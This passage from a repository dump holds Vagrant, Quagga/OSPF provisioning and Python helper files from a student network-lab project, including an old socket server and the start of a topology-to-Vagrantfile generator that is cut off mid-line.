"text": "##### One Host and a Mysql server with the Docker ####\n\n# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# configures the configuration version (we support older styles for\n# backwards compatibility). Please don't change it unless you know what\n# you're doing.\nVagrant.configure(\"2\") do |config|\n config.vm.box_check_update = true\n config.vm.provider \"virtualbox\" do |vb|\n vb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\n vb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\n vb.cpus = 1\n end\n config.vm.define \"router-1\" do |router1|\n router1.vm.box = \"bento/ubuntu-16.04\"\n router1.vm.hostname = \"router-1\"\n router1.vm.network \"private_network\", ip: \"192.168.10.2\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: true\n router1.vm.network \"private_network\", ip: \"192.168.10.3\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\n\trouter1.vm.network \"private_network\", ip: \"192.168.10.4\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: true\n router1.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \" Quagga Router-2 start installing\"\n\t#sudo sysctl -w net.ipv4.ip_forward=1\n\tsudo apt-get update\n\tsudo apt-get install quagga quagga-doc traceroute\n\tsudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\n\tsudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\n\tsudo chown quagga.quaggavty /etc/quagga/*.conf\n\tsudo /etc/init.d/quagga start\n\tsudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\n\tsudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\n\tsudo echo 'VTYSH_PAGER=more' >>/etc/environment\n\tsudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\n\tsudo /etc/init.d/quagga restart\n\techo \"Routing Protocol ospf Configuration Started\"\n\tsudo vtysh -c '\n\tconfigure terminal\n\trouter ospf\n\tnetwork 192.168.10.0/24 area 0.0.0.0\n\tinterface eth1\n\tip address 192.168.10.2/24\n\texit\n\tinterface eth2\n\tip address 192.168.10.3/24\n\texit\n\tinterface eth3\n\tip address 192.168.10.4/24\n\tdo write\n\texit\n\texit\n\tip forwarding\n\texit'\n\techo \"Configuration END\"\n\techo \"Router--1 is ready to Use\"\t\n\tSHELL\n\trouter1.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"host-a\" do |hosta|\n hosta.vm.box = \"bento/ubuntu-16.04\"\n hosta.vm.hostname = \"host-a\"\n hosta.vm.network \"private_network\", ip: \"192.168.10.10\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: true\n hosta.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started for Host--A\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.2 dev eth1\n\techo \"Configuration END\"\n\techo \"Host--A is ready to Use\"\t\n\tSHELL\n\thosta.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n # Configure web server machine\n config.vm.define \"web1\" do |web1|\n web1.vm.box = \"bento/ubuntu-16.04\"\n\t\t web1.vm.hostname = 
\"web-1\"\n web1.vm.network \"private_network\", ip: \"192.168.10.11\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\n web1.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\t echo \"Static Routig configuration Started for web-1\"\n\t sudo sysctl -w net.ipv4.ip_forward=1\n\t sudo route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.3 dev eth1\n echo \"Configuration END\"\n\t #echo \"web-1 is ready to Use\"\t\n\t SHELL\n\t\t web1.vm.provision \"docker\" do |doc|\n\t\t doc.pull_images \"nginx\"\n\t\t doc.pull_images \"php\"\n\t\t doc.run \"nginx\"\n\t\t doc.run \"php\"\n web1.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n end\n # Configure database server machine\n config.vm.define \"db1\" do |db1|\n db1.vm.box = \"bento/ubuntu-16.04\"\n\t\t db1.vm.hostname = \"db-1\"\n db1.vm.network \"private_network\", ip: \"192.168.10.12\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: true\n db1.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\t echo \"Static Routig configuration Started for db-1\"\n\t sudo sysctl -w net.ipv4.ip_forward=1\n\t sudo route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.4 dev eth1\n echo \"Configuration END\"\n\t #echo \"Host--B is ready to Use\"\t\n\t SHELL\n\t\t db1.vm.provision \"docker\" do |doc|\n\t doc.pull_images \"mysql\"\n\t\t doc.run \"mysql\"\n\t\t db1.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n\tend\t \t \n end\n end\n\n\n\n\n"
},
{
"alpha_fraction": 0.6312790513038635,
"alphanum_fraction": 0.6792327165603638,
"avg_line_length": 45.78666687011719,
"blob_id": "f96ab82f36d906f0f61c86fdf7b20e2f924a127b",
"content_id": "035d76baa8f5fdbaa37f8178fcc317573e7f32fb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10531,
"license_type": "permissive",
"max_line_length": 235,
"num_lines": 225,
"path": "/fromHTMLtoVagrant/OldScripts/OSPFRoutingVag.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport os\n\n\n# In[4]:\n\n\nf = open(\"OSPFRoutingvagrant.txt\", \"w\")\nf.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\nf.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\nf.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\nf.write(\"config.vm.box_check_update = true\\n\")\nf.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\nf.write(\"vb.cpus = 1\\n\")\nf.write(\"end\\n\")\n\n\nf.write(\"config.vm.define \\\"router-1\\\" do |router1|\\n\")\nf.write(\"router1.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router1.vm.hostname = \\\"router-1\\\"\\n\")\nf.write(\"router1.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\nf.write(\"router1.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-1\\\", auto_config: false\\n\")\nf.write(\"router1.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-3\\\", auto_config: false\\n\")\nf.write(\"router1.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\" Quagga Router-1 start installing\\\"\\n\")\nf.write(\"#sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo apt-get update\\n\")\nf.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\nf.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\nf.write(\"sudo /etc/init.d/quagga start\\n\")\nf.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\nf.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\nf.write(\"sudo /etc/init.d/quagga restart\\n\")\nf.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\nf.write(\"sudo vtysh -c '\\n\")\nf.write(\"configure terminal\\n\")\nf.write(\"router ospf\\n\")\nf.write(\"network 192.168.1.0/24 area 0\\n\")\nf.write(\"network 192.168.100.0/24 area 0\\n\") \nf.write(\"network 192.168.101.0/24 area 0\\n\") \nf.write(\"exit\\n\")\nf.write(\"interface eth1\\n\")\nf.write(\"ip address 192.168.1.254/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth2\\n\")\nf.write(\"ip address 192.168.100.1/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth3\\n\")\nf.write(\"ip address 192.168.101.2/24\\n\")\nf.write(\"do write\\n\")\nf.write(\"exit\\n\")\nf.write(\"exit\\n\")\nf.write(\"ip forwarding\\n\")\nf.write(\"exit'\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--1 
is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"#router1.vm.provision \\\"shell\\\", path: \\\"common.sh\\\"\\n\")\nf.write(\"router1.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"router-2\\\" do |router2|\\n\")\nf.write(\"router2.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router2.vm.hostname = \\\"router-2\\\"\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: false\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-2\\\", auto_config: false\\n\")\nf.write(\"router2.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-1\\\", auto_config: false\\n\")\nf.write(\"router2.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\" Quagga Router-2 start installing\\\"\\n\")\nf.write(\"#sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo apt-get update\\n\")\nf.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\nf.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\nf.write(\"sudo /etc/init.d/quagga start\\n\")\nf.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\nf.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\nf.write(\"sudo /etc/init.d/quagga restart\\n\")\nf.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\nf.write(\"sudo vtysh -c '\\n\")\nf.write(\"configure terminal\\n\")\nf.write(\"router ospf\\n\")\nf.write(\"network 192.168.2.0/24 area 0.0.0.0\\n\")\nf.write(\"network 192.168.100.0/24 area 0.0.0.0\\n\")\nf.write(\"network 192.168.102.0/24 area 0.0.0.0\\n\")\nf.write(\"interface eth1\\n\")\nf.write(\"ip address 192.168.2.254/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth2\\n\")\nf.write(\"ip address 192.168.100.2/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth3\\n\")\nf.write(\"ip address 192.168.102.2/24\\n\")\nf.write(\"do write\\n\")\nf.write(\"exit\\n\")\nf.write(\"exit\\n\")\nf.write(\"ip forwarding\\n\")\nf.write(\"exit'\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--2 is ready to Use\\\"\\n\")\t\nf.write(\"SHELL\\n\")\nf.write(\"router2.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"router-3\\\" do |router3|\\n\")\nf.write(\"router3.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"router3.vm.hostname = \\\"router-3\\\"\\n\")\nf.write(\"router3.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: false\\n\")\nf.write(\"router3.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-3\\\", auto_config: false\\n\")\nf.write(\"router3.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-2\\\", auto_config: false\\n\")\nf.write(\"router3.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Quagga Router-3 start installing\\\"\\n\")\nf.write(\"#sudo sysctl -w 
net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo apt-get update\\n\")\nf.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\nf.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\nf.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\nf.write(\"sudo /etc/init.d/quagga start\\n\")\nf.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\nf.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\nf.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\nf.write(\"sudo /etc/init.d/quagga restart\\n\")\nf.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\nf.write(\"sudo vtysh -c '\\n\")\nf.write(\"configure terminal\\n\")\nf.write(\"router ospf\\n\")\nf.write(\"network 192.168.3.0/24 area 0.0.0.0\\n\")\nf.write(\"network 192.168.101.0/24 area 0.0.0.0\\n\")\nf.write(\"network 192.168.102.0/24 area 0.0.0.0\\n\")\nf.write(\"interface eth1\\n\")\nf.write(\"ip address 192.168.3.254/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth2\\n\")\nf.write(\"ip address 192.168.101.1/24\\n\")\nf.write(\"exit\\n\")\nf.write(\"interface eth3\\n\")\nf.write(\"ip address 192.168.102.1/24\\n\")\nf.write(\"do write\\n\")\nf.write(\"exit\\n\")\nf.write(\"exit\\n\")\nf.write(\"ip forwarding\\n\")\nf.write(\"exit'\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--3 is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"router3.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-a\\\" do |hosta|\\n\")\nf.write(\"hosta.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hosta.vm.hostname = \\\"host-a\\\"\\n\")\nf.write(\"hosta.vm.network \\\"private_network\\\", ip: \\\"192.168.1.1\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: true\\n\")\nf.write(\"hosta.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started for Host--A\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--A is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hosta.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-b\\\" do |hostb|\\n\")\nf.write(\"hostb.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hostb.vm.hostname = \\\"host-b\\\"\\n\")\nf.write(\"hostb.vm.network \\\"private_network\\\", ip: \\\"192.168.2.1\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\")\nf.write(\"hostb.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started for Host--B\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.254 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--B is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostb.vm.provider 
\\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-c\\\" do |hostc|\\n\")\nf.write(\"hostc.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hostc.vm.hostname = \\\"host-c\\\"\\n\")\nf.write(\"hostc.vm.network \\\"private_network\\\", ip: \\\"192.168.3.1\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: true\\n\")\nf.write(\"hostc.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.254 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--C is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostc.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\n\n\n#open and read the file after the appending:\nf = open(\"OSPFRoutingvagrant.txt\", \"r\")\nprint(f.read())\n\n\n# In[ ]:\n\n\n\n\n"
},
{
"alpha_fraction": 0.6584978699684143,
"alphanum_fraction": 0.6678012013435364,
"avg_line_length": 34.82926940917969,
"blob_id": "090267338c33e7ce72f9fd994eb4e702d20612bb",
"content_id": "d56c1357550ed65d8af049fc7c1d20cb7c3c0792",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4407,
"license_type": "permissive",
"max_line_length": 172,
"num_lines": 123,
"path": "/Server and Client/oldstuff/server.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import socket \nimport threading\n\n#those imports where added by luca\nfrom matplotlib import pyplot as plt \nimport os\nfrom os import path\nfrom PyQt5 import QtWidgets, QtCore\nfrom pyqtgraph import PlotWidget, plot\nimport pyqtgraph as pg\nimport sys \n\n\nHEADER = 64 # It's header length, it can be change.\nPORT = 5050 # port number where the server is going to talk (run).\nSERVER = \"192.168.53.133\" # this is ip of server, it can be change according to the server IP address.\n#SERVER = socket.gethostbyname(socket.gethostname()) # this another way to give the iP address by host name.\nADDR = (SERVER, PORT) # here we have bind the server and port.\nFORMAT = 'utf-8' # it's formate for the message\nDISCONNECT_MESSAGE = \"!DISCONNECT\"\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Here we can create different kind of socket to get different kind of data. (socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDR) # here we have bound that with ADDR.\n\ndef handle_client(conn, addr): # funcation to handel the clients that are going to connect with server.\n print(f\"[NEW CONNECTION] {addr} connected.\")\n\n connected = True\n while connected:\n msg_length = conn.recv(HEADER).decode(FORMAT) # receiving information for the client.\n if msg_length:\n msg_length = int(msg_length)\n msg = conn.recv(msg_length).decode(FORMAT)\n if msg == DISCONNECT_MESSAGE:\n connected = False\n\n print(f\"[{addr}] {msg}\")\n conn.send(\"Msg received\".encode(FORMAT))\n\n conn.close()\n \n\ndef start(): # its just start the socket server for us.\n server.listen()\n print(f\"[LISTENING] Server is listening on {SERVER}\")\n while True: # it will keep listening until server crash or stop.\n conn, addr = server.accept() # for new connection\n thread = threading.Thread(target=handle_client, args=(conn, addr))\n thread.start()\n print(f\"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}\")\n\n#this function is to plot the TCP data given an array of value for X axis and another array of values of the same size for the Y axis\n#the plot is an image file that can be found in the \"/plot\" directory\n#this is just \"standard\" plot, not the cool-looking one with pyqt5\n#this function was added by Luca\ndef save_plot(X,Y):\n if not path.exists(\"/plots\"):\n os.system(\"mkdir plots\")\n\n plt.title(\"TCP data\")\n plt.xlabel(\"X values\")\n plt.ylabel(\"Y values\")\n\n plt.plot(X,Y) \n plt.savefig(\"plots/TCPplot.png\")\n plt.clf()\n\n#this function is to plot the TCP data given using \"X\" and \"Y\" as arrays for the x and y axis\n#this is just is supposed to be the cool-looking graph with pyqt5 :)\n#the name of the function is create_plot() the class is used as a support it should not be used standalone\n#this function was added by Luca\nclass MainWindow(QtWidgets.QMainWindow):\n\n def __init__(self, *args, **kwargs):\n\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.graphWidget = pg.PlotWidget()\n self.setCentralWidget(self.graphWidget)\n\n self.graphWidget.setTitle(\"TCP data\")\n self.graphWidget.setLabel('left', 'Y axis label ')\n self.graphWidget.setLabel('bottom', 'X axis label')\n self.graphWidget.showGrid(x=True, y=True)\n\n #here self.x and self.y should be the arrays with data of x and y axis\n #now it's just random generated data, substitite it with the actually arrays\n self.x = list(range(100)) \n self.y = [randint(0,100) for _ in range(100)] \n\n self.data_line = self.graphWidget.plot(self.x, self.y) #X,Y\n\n #stuff for updating \n self.timer = QtCore.QTimer()\n 
self.timer.setInterval(50)\n\n #this is the function that need to be called to update the plot of the graph\n self.timer.timeout.connect(self.update_plot_data)\n self.timer.start()\n\n\n def update_plot_data(self):\n\n self.x = self.x[1:] \n self.x.append(self.x[-1] + 1) \n\n self.y = self.y[1:] \n\n new_value = randint(0,10) #place-holder value, it should be the updated value for the y axis whene new data comes\n self.y.append(new_value) \n\n self.data_line.setData(self.x, self.y).\n\n\ndef create_plot():\n app = QtWidgets.QApplication(sys.argv)\n plt = MainWindow()\n plt.show()\n sys.exit(app.exec_())\n\n\nprint(\"[STARTING] server is starting...\")\nstart()\n"
},
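The server above frames every message with a fixed-width length header: the sender first transmits HEADER bytes holding the payload length as text, then the payload itself. A minimal client-side sketch of that framing (not part of the repository; SERVER, PORT, HEADER, and FORMAT are assumed to match the server's constants):

import socket

HEADER = 64
PORT = 5050
SERVER = "192.168.53.133"  # assumed: the address server.py binds to
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"

def send(sock, msg):
    payload = msg.encode(FORMAT)
    header = str(len(payload)).encode(FORMAT)
    header += b' ' * (HEADER - len(header))  # pad the length field to exactly HEADER bytes
    sock.sendall(header)
    sock.sendall(payload)

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((SERVER, PORT))
send(client, "Hello")
send(client, DISCONNECT_MESSAGE)  # tells handle_client() to stop and close the connection
client.close()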
{
"alpha_fraction": 0.5684430599212646,
"alphanum_fraction": 0.6060606241226196,
"avg_line_length": 34.44444274902344,
"blob_id": "71660664cc0c4a8db301d1b4183ec75ef64e4f72",
"content_id": "c0887178e46ddbc962f3daca390b236ce503fd92",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 957,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 27,
"path": "/AllVagrantFiles/Simple_web_server_and_a_Host/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "# webserver and a host you can access the webserver from your browser with ip address 10.0.0.50 or from the host \n\n# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\nVagrant.configure(\"2\") do |config|\n # Configure web server machine\n config.vm.define \"web1\" do |web1|\n web1.vm.box = \"ubuntu/xenial64\"\n\t\t web1.vm.hostname = \"web-1\"\n web1.vm.network \"private_network\", ip: \"10.0.0.50\"\n web1.vm.provision \"shell\", inline: <<-SHELL \n echo 'Starting Provision: web server'\n sudo apt-get update\n sudo apt-get install -y nginx\n touch /var/www/html/index.php\n sudo apt-get install -y php-fpm php-mysql\n echo 'Provision web server complete'\n\t\t SHELL\n\t\t end\n # Configure database server machine\n config.vm.define \"db1\" do |db1|\n db1.vm.box = \"ubuntu/xenial64\"\n\t db1.vm.hostname = \"db-1\"\n\t\t db1.vm.network \"private_network\", ip: \"10.0.0.51\"\n end\n end\n"
},
{
"alpha_fraction": 0.5685438513755798,
"alphanum_fraction": 0.5916286706924438,
"avg_line_length": 38.23653793334961,
"blob_id": "5bfcd1a906192171ed9914bee388395f4851cd7c",
"content_id": "c3f2430374b3202d17d706f6fd708588869e8db6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20405,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 520,
"path": "/fromHTMLtoVagrant/VagrantTopologyMySQL.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc\nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n\n f.write(\"##### One Host and a Mysql server with the Docker ####\")\n\n f.write(\"# -*- mode: ruby -*-\\n\")\n f.write(\"# vi: set ft=ruby :\\n\")\n\n f.write(\"# All Vagrant configuration is done below. The \\\"2\\\" in Vagrant.configure\\n\")\n f.write(\"# configures the configuration version (we support older styles for\\n\")\n f.write(\"# backwards compatibility). Please don't change it unless you know what\\n\")\n f.write(\"# you're doing.\\n\")\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"config.vm.box_check_update = true\\n\")\n f.write('config.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\\n')\n f.write('vb.cpus = 1\\n')\n f.write('end\\n')\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f, Host, edges):\n\n # print(\"adding an host to the vagrant file\")\n\n #extrapolate each attribute from the touples\n Id = Host[\"id\"]\n Name = Host[\"label\"]\n Os = Host[\"vm_image\"]\n Ram = Host[\"ram\"]\n N_Cpus = Host[\"n_cpus\"]\n Ip = Host[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Host[\"network_interfaces\"][0][\"netmask\"]\n Interface = Host[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Host[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n \n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n CustumScript = Host[\"custom_script\"]\n #there must be a more efficient way to calculate this, this one is too trivial\n for x in Network:\n Gateway = str(x)\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name 